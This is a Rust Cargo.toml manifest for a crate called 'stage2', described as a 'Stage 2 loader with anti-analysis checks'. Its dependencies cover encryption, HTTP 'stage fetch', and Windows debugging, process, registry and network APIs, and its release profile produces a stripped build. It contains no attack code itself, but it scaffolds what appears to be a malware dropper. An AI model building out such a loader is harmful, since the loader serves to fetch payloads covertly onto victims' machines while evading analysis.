[package]
name = "stage2"
version = "0.1.0"
edition = "2021"
authors = ["diemoeve"]
description = "Stage 2 loader with anti-analysis checks"

[dependencies]
# Crypto (oxide-compatible)
aes-gcm = "0.10"
pbkdf2 = "0.12"
sha2 = "0.10"

# HTTP for stage fetch
reqwest = { version = "0.11", default-features = false, features = ["rustls-tls", "blocking"] }

# Error handling
thiserror = "1.0"

# Windows-specific
[target.'cfg(windows)'.dependencies]
windows = { version = "0.52", features = [
    "Win32_Foundation",
    "Win32_System_Threading",
    "Win32_System_Diagnostics_Debug",
    "Win32_System_Diagnostics_ToolHelp",
    "Win32_System_SystemInformation",
    "Win32_System_Registry",
    "Win32_NetworkManagement_IpHelper",
    "Win32_Security",
    "Win32_UI_WindowsAndMessaging",
] }

[profile.release]
opt-level = "s"
lto = true
strip = true
panic = "abort"
